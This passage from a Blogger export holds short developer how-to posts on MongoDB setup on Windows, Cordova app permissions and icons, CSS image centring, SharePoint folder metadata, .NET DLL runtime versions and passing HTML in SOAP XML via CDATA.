# tell it where to log messages<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in;">
logpath=C:\mongodb\log\mongodb.log<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in;">
logappend=true<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in;">
# only run on localhost<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in;">
bind_ip = 127.0.0.1 <o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in;">
port = 27017<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in;">
rest = true<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">Ø<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->Save the file with name “Mongodb.conf” and save
it inside the folder “C:\mongodb\conf”<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">Ø<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->Go to “C” drive and create a new folder “data” (i.e C:\data )<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">Ø<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->Go to created folder and create a subfolder with
name “db”. So the path will be “C:\data\db”<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in;">
<br /></div>
<div class="MsoNormal" style="margin-left: .5in;">
You are done, MongoDB setup is
done.<o:p></o:p></div>
<div class="MsoNormal">
Here’s the steps to confirm the setup:<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">Ø<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->Open command prompt<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">Ø<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->Navigate to “C:\MongoDB\Bin” folder in command
prompt<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">Ø<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->Type “Mongod” and enter<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">Ø<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->You should able to see messages like “Waiting
for connections on port 27017”<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">Ø<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->Open a new command prompt ( don’t close exiting
command prompt)<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">Ø<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->Navigate to “C:\MongoDB\Bin” folder in command
prompt<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">Ø<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->Type “Mongo” and enter<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">Ø<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->You will be getting a message “MongoDB shell
version and connecting to “test” db”<o:p></o:p></div>
<div class="MsoNormal" style="margin-left: .5in; mso-list: l0 level1 lfo1; text-indent: -.25in;">
<!--[if !supportLists]--><span style="font-family: "wingdings"; mso-bidi-font-family: Wingdings; mso-fareast-font-family: Wingdings;">Ø<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal;">
</span></span><!--[endif]-->Also if you see in another opened command
prompt, the message will be changed to “Connection accepted from “127.0.0.1”…etc”<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<br />
<div class="MsoNormal">
That’s it , your setup and confirmation done. Now you can
start interacting with db either through app or via cmd prompt.<o:p></o:p></div>
Ramkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.com0tag:blogger.com,1999:blog-6523941902002289478.post-46522487688743058532015-12-28T20:01:00.005+05:302015-12-28T20:01:56.711+05:30Application does not have sufficient geolocation permissions error - Cordova android hybrid app developementApplication does not have sufficient Geolocation permissions error - Cordova android hybrid app development<br />
<br />
I was getting this error while try to run my geolocation code in andorid device.<br />
<br />
The reason was location access permission for the app is not enabled to app manifest.<br />
<br />
Here's how to add the permission:<br />
<br />
open your android manifest. xml file:<br />
<br />
it will be in the location : platforms\android\<br />
<br />
and the below tag:<br />
<uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" /><br />
<uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" /><br />
<uses-permission android:name="android.permission.ACCESS_LOCATION_EXTRA_COMMANDS" /><br />
<br />
Then rebuild the app and run it .<br />
<br />
It should work. !!!Ramkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.com6tag:blogger.com,1999:blog-6523941902002289478.post-5170133386686878352015-10-18T18:26:00.001+05:302019-10-22T21:50:58.306+05:30IoT Mobile Apps development using HTML 5 and Javascript<div style="border: 0px; box-sizing: border-box; font-stretch: inherit; line-height: 32px; margin-bottom: 32px; outline: 0px; padding: 0px; vertical-align: baseline;">
<span style="font-family: inherit;">Recently, I came to know about an interesting framework called "Evothings" which makes developers life easy as to develop Mobile IoT applications just by using HTML 5 and JavaScript.</span><br />
<span style="font-family: inherit;">It helps developers to build or connect with any bluetooth, BLE, Wifi , NFC devices just with little help of HTML 5 and Java script.</span><br />
<span style="font-family: inherit;">Evothings is a Sweden based startup and it is hyperload live mobile development feature is fantastic, it is makes developing and testing very easy. This framework comes with lot of working examples in connecting with different devices. And of-course it is open source apache 2 licensed framework.</span><br />
<span style="font-family: inherit;">It supports connectivity to many devices (working examples for each given)</span><br />
<span style="font-family: inherit;">To name few devices</span><br />
<span style="font-family: inherit;">Estimote beacons, Aurdino, Philips HUE light, Electric Imp, Rasberry pi,etc...</span></div>
Ramkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.com5tag:blogger.com,1999:blog-6523941902002289478.post-35805895505408026002015-10-12T16:09:00.001+05:302020-12-13T10:07:34.259+05:30Apache cordova App - Change App icon or logo.<p> To change the default icon or logo of an Cordova application. we just have to replace the default icon.png from the below folder icons and re-build the cordova app and then deploy it. </p><p><u><b>For iOS:</b></u></p><p>PROJECT_PATH/platforms/ios/PROJECT_NAME/Resources/icons</p><p><br /></p><p><b><u>For Android:</u></b></p><p>PROJECT_PATH/platforms/android/res/drawable</p><p>also you need to update the icon name change in manifest file.</p><p>PROJECT_PATH/platforms/android/AndroidManifest.xml</p>Ramkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.com0tag:blogger.com,1999:blog-6523941902002289478.post-44419193785594918292015-10-09T19:02:00.000+05:302015-10-09T19:03:17.010+05:30Cordova platform : " Error: Failed to run "ant -version", make sure you have ant installed and added to your PATH "<span style="font-family: Arial, Helvetica, sans-serif;">I was getting below error while doing Cordova environment initial setup.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="font-family: Arial, Helvetica, sans-serif;">Few hours of wasting time in googling , have find out that the issue was "empty" space in the PATH.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<span style="background-color: white; color: #222222; line-height: 19.5px;"><span style="font-family: Arial, Helvetica, sans-serif;">So I changed from </span></span><code style="background-color: #eeeeee; border: 0px; color: #222222; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', 'Courier New', monospace, sans-serif; margin: 0px; padding: 1px 5px; white-space: pre-wrap;">C:\Program Files\...</code><span style="background-color: white; color: #222222; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 19.5px;"> to </span><code style="background-color: #eeeeee; border: 0px; color: #222222; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', 'Courier New', monospace, sans-serif; margin: 0px; padding: 1px 5px; white-space: pre-wrap;">C:\Progra~1\...</code><span style="background-color: white; color: #222222; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 19.5px;">.</span><br />
<span style="background-color: white; color: #222222; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 19.5px;"><br /></span>
<span style="background-color: white; color: #222222; line-height: 19.5px;"><span style="font-family: Arial, Helvetica, sans-serif;">This fixed the issue and now when I run</span></span><span style="background-color: white; color: #222222; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 19.5px;"> </span><span style="background-color: #eeeeee; color: #222222; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', 'Courier New', monospace, sans-serif; line-height: 16.8999996185303px; white-space: pre-wrap;">cordova platform add android </span><span style="background-color: white; color: #222222; line-height: 16.8999996185303px; white-space: pre-wrap;"><span style="font-family: Arial, Helvetica, sans-serif;">command it executes successfully with out any errors.</span></span>Ramkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.com0tag:blogger.com,1999:blog-6523941902002289478.post-50144938079518113622015-10-07T19:34:00.000+05:302015-10-07T19:34:01.026+05:30Horizontal center align the Image inside the DivIf we have just text inside DIV , we can make that content center aligned just by giving "text-align:center". But in the case of having image inside the DIV and we wanted to make the image to be center aligned in DIV then "text-align:center" will NOT help.<br />
<br />
<b>Quick/ Easy fix is :</b><br />
<br />
<div class="container><br />
<img src="somthing.jpg" class="img"><br />
</div><br />
<br />
<style><br />
.container { text-align:center;}<br />
.img { display:inline; margin:0; padding:0}<br />
</style><br />
<br />Ramkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.com0tag:blogger.com,1999:blog-6523941902002289478.post-60021759550350447522015-09-16T19:16:00.003+05:302015-09-16T19:33:55.375+05:30How do I add a column (meta data) to SharePoint folders?<div class="MsoNormal">
My first thought is to modify the Content Type named Folder,
but it is "sealed". (Microsoft locked the door!) So I created a new
Content Type based on Folder, added the custom column, added the content type
to the library and magically I found my custom folder type in the New dropdown.
Here's the steps:</div>
<div class="MsoNormal">
<o:p></o:p></div>
<div class="MsoNormal">
<br /></div>
<br />
<ol start="1" style="margin-top: 0in;" type="1">
<li class="MsoNormal">Go to <b>Site
Actions</b>, <b>Site Settings</b> <o:p></o:p></li>
<li class="MsoNormal">Click <b>Site
Content Types</b> <o:p></o:p></li>
<li class="MsoNormal">Click <b>Create</b><o:p></o:p></li>
<li class="MsoNormal">Give
the new content type a name such as "Enhanced Folder" or
"Product Spec Folder"<o:p></o:p></li>
<li class="MsoNormal">Set
the parent content type group as <b>Folder Content Types</b><o:p></o:p></li>
<li class="MsoNormal">Set
the parent content type to <b>Folder</b><o:p></o:p></li>
<li class="MsoNormal">Add
the new content type to a Group. I put it back in the "Folder Content
Types" group<o:p></o:p></li>
<li class="MsoNormal">Click <b>OK</b><o:p></o:p></li>
<li class="MsoNormal">Scroll
down to the columns section and click <b>Add from new site column</b><o:p></o:p></li>
<li class="MsoNormal">Name
the column and set all the usual column options<o:p></o:p></li>
<li class="MsoNormal">Repeat
for any additional columns (Release Date, etc)<o:p></o:p></li>
<li class="MsoNormal">Click <b>OK</b><o:p></o:p></li>
<li class="MsoNormal">Go to
your document library<o:p></o:p></li>
<li class="MsoNormal">Click <b>Settings</b> and <b>Library
Settings,</b> or in 2010 click the Library ribbon tab and then click
Library Settings<o:p></o:p></li>
<li class="MsoNormal">Click <b>Advanced</b> and
set <b>Allow management of content types</b> to <b>Yes</b> and
click <b>OK</b> (this may already selected)<o:p></o:p></li>
<li class="MsoNormal">Scroll
down to <b>Content Types</b> and click <b>Add</b> from
existing site content types and add your new folder content type<o:p></o:p></li>
<li class="MsoNormal">Go to
your document library and click the <b>New</b> dropdown, or the
New button in the 2010 Document ribbon, and add your new folder!<o:p></o:p></li>
<li class="MsoNormal">Go to
the View dropdown and click <b>Modify this view</b> and add your
new folder meta data columns (you will probably want to move them to just
after the Name column)<o:p></o:p></li>
</ol>
Ramkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.com0tag:blogger.com,1999:blog-6523941902002289478.post-61641982744432260262015-09-14T16:25:00.003+05:302015-09-14T16:25:54.920+05:30How to find Runtime version of a DLL <h3>
<b>What is Runtime version: ?</b></h3>
<span style="background-color: white; color: #222222; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 15px; line-height: 19.5px;">Runtime version is the .Net framework version that the library was built against. </span><br />
<span style="background-color: white; color: #222222; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 15px; line-height: 19.5px;"><br /></span>
We can be able to find runtime version of our custom DLL using assembly reflection:<br />
<br />
<b>Sample code:</b><br />
<br />
System.Reflection.Assembly myDll = System.Reflection.Assembly.ReflectionOnlyLoadFrom("C:\\mySolution.dll");<br />
Console.WriteLine(myDll.ImageRuntimeVersion);\<br />
<br />
<br />Ramkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.com0tag:blogger.com,1999:blog-6523941902002289478.post-6703488837804404932015-08-25T20:22:00.004+05:302015-08-25T21:55:09.747+05:30Send / Passing HTML Markup in SOAP XML as string When we try to pass HTML markup as parameter string in SOAP XML, the SOAP request will get failed due to special characters / markups in the request XML.<br />
<div>
<br /></div>
<div>
I had faced this issue when I try to update SharePoint RichText list item using SharePoint web service post request.<br />
<div>
<br /></div>
<div>
<b>Here's the code which was NOT working :</b></div>
</div>
<div>
<br /></div>
<div>
<div>
var soapEnv = "<?xml version=\'1.0\' encoding=\'utf-8\'?> \</div>
<div>
<soap:Envelope xmlns:xsi=\'http://www.w3.org/2001/XMLSchema-instance\' \</div>
<div>
xmlns:xsd=\'http://www.w3.org/2001/XMLSchema\' \</div>
<div>
xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/\'> \</div>
<div>
<soap:Body> \</div>
<div>
<UpdateListItems xmlns='http://schemas.microsoft.com/sharepoint/soap/'> \</div>
<div>
<listName>MyListName</listName> \</div>
<div>
<updates> \</div>
<div>
<Batch OnError='Continue'> \</div>
<div>
<Method ID='1' Cmd='Update'> \</div>
<div>
<Field Name='ID'>1</Field> \</div>
<div>
<Field Name='Desc'><span style="background-color: #ffe599;"><div><strong>My HTML markup content here <br></strong></span></Field> \</div>
<div>
</Method> \</div>
<div>
</Batch> \</div>
<div>
</updates> \</div>
<div>
</UpdateListItems> \</div>
<div>
</soap:Body> \</div>
<div>
</soap:Envelope>";</div>
</div>
<div>
<br /></div>
<div>
if we post above SOAP xml , the webservice will throw error due to html markup in request XML.</div>
<div>
<br /></div>
<div>
To fix the above issue.<br />
<br /></div>
<div>
We can replace markup characters<code style="background-color: #eeeeee; border: 0px; color: #222222; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', 'Courier New', monospace, sans-serif; font-size: 13px; margin: 0px; padding: 1px 5px; white-space: pre-wrap;"><</code><span style="background-color: white; color: #222222; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 15px; line-height: 19.5px;"> with </span><code style="background-color: #eeeeee; border: 0px; color: #222222; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', 'Courier New', monospace, sans-serif; font-size: 13px; margin: 0px; padding: 1px 5px; white-space: pre-wrap;">&lt;</code><span style="background-color: white; color: #222222; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 15px; line-height: 19.5px;">, </span><code style="background-color: #eeeeee; border: 0px; color: #222222; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', 'Courier New', monospace, sans-serif; font-size: 13px; margin: 0px; padding: 1px 5px; white-space: pre-wrap;">></code><span style="background-color: white; color: #222222; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 15px; line-height: 19.5px;">with </span><code style="background-color: #eeeeee; border: 0px; color: #222222; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', 'Courier New', monospace, sans-serif; font-size: 13px; margin: 0px; padding: 1px 5px; white-space: pre-wrap;">&gt;</code><span style="background-color: white; color: #222222; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 15px; line-height: 19.5px;"> and </span><code style="background-color: #eeeeee; border: 0px; color: #222222; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', 'Courier New', monospace, sans-serif; font-size: 13px; margin: 0px; padding: 1px 5px; white-space: pre-wrap;">&</code><span style="background-color: white; color: #222222; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 15px; line-height: 19.5px;"> with </span><code style="background-color: #eeeeee; border: 0px; color: #222222; font-family: Consolas, Menlo, Monaco, 'Lucida Console', 'Liberation Mono', 'DejaVu Sans Mono', 'Bitstream Vera Sans Mono', 'Courier New', monospace, sans-serif; font-size: 13px; margin: 0px; padding: 1px 5px; white-space: pre-wrap;">&amp;</code><span style="background-color: white; color: #222222; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 15px; line-height: 19.5px;">.</span><br />
<span style="background-color: white; color: #222222; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 15px; line-height: 19.5px;"><br /></span>
<span style="background-color: white; color: #222222; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 15px; line-height: 19.5px;"> OR </span><br />
<span style="background-color: white; color: #222222; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 15px; line-height: 19.5px;"><br /></span>
<span style="background-color: white; color: #222222; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 15px; line-height: 19.5px;"> We can use the easy way of using CDATA.</span></div>
<div>
<span style="background-color: white; color: #222222; font-family: 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 15px; line-height: 19.5px;"><br /></span></div>
<div>
<span style="color: #222222; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="background-color: white; font-size: 15px; line-height: 19.5px;">using CDATA , we can pass HTML markup placed inside SOAP xml request.</span></span></div>
<div>
<span style="color: #222222; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="background-color: white; font-size: 15px; line-height: 19.5px;"><br /></span></span></div>
<div>
<span style="color: #222222; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="background-color: white; font-size: 15px; line-height: 19.5px;"><b>Here is the Working code:</b></span></span></div>
<div>
<span style="color: #222222; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="background-color: white; font-size: 15px; line-height: 19.5px;"><b><br /></b></span></span></div>
<div>
<span style="font-size: 15px; line-height: 19.5px;"><span style="color: #222222; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"></span></span><br />
<div style="background-color: white;">
<span style="font-size: 15px; line-height: 19.5px;"><span style="color: #222222; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"> var soapEnv = "<?xml version=\'1.0\' encoding=\'utf-8\'?> \</span></span></div>
<span style="font-size: 15px; line-height: 19.5px;"><span style="color: #222222; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;">
</span></span>
<br />
<div style="background-color: white;">
<span style="font-size: 15px; line-height: 19.5px;"><span style="color: #222222; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><soap:Envelope xmlns:xsi=\'http://www.w3.org/2001/XMLSchema-instance\' \</span></span></div>
<span style="font-size: 15px; line-height: 19.5px;"><span style="color: #222222; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;">
</span></span>
<div style="background-color: white;">
<span style="font-size: 15px; line-height: 19.5px;"><span style="color: #222222; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;">xmlns:xsd=\'http://www.w3.org/2001/XMLSchema\' \</span></span></div>
<span style="font-size: 15px; line-height: 19.5px;"><span style="color: #222222; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;">
<div style="background-color: white;">
xmlns:soap='http://schemas.xmlsoap.org/soap/envelope/\'> \</div>
<div style="background-color: white;">
<soap:Body> \</div>
<div style="background-color: white;">
<UpdateListItems xmlns='http://schemas.microsoft.com/sharepoint/soap/'> \</div>
<div style="background-color: white;">
<listName><span style="color: black; font-family: 'Times New Roman'; font-size: small; line-height: normal;">MyListName</span></listName> \</div>
<div style="background-color: white;">
<updates> \</div>
<div style="background-color: white;">
<Batch OnError='Continue'> \</div>
<div style="background-color: white;">
<Method ID='1' Cmd='Update'> \</div>
<div style="background-color: white;">
<Field Name='ID'>1</Field> \</div>
<div>
<span style="background-color: white;"><Field Name='Desc'></span><span style="background-color: #ffe599;"><![CDATA[<span style="color: black; font-family: 'Times New Roman'; font-size: small; line-height: normal;"><div><strong>My HTML markup content here <br></strong></span>]]></span><span style="background-color: white;"></Field> \</span></div>
<div style="background-color: white;">
</Method> \</div>
<div style="background-color: white;">
</Batch> \</div>
<div style="background-color: white;">
</updates> \</div>
<div style="background-color: white;">
</UpdateListItems> \</div>
<div style="background-color: white;">
</soap:Body> \</div>
<div style="background-color: white;">
</soap:Envelope>";</div>
</span></span></div>
<div>
<span style="color: #222222; font-family: Helvetica Neue, Helvetica, Arial, sans-serif;"><span style="background-color: white; font-size: 15px; line-height: 19.5px;"><br /></span></span></div>
<div>
<br /></div>
Ramkumar Krishnanhttp://www.blogger.com/profile/07593862251269402877noreply@blogger.com0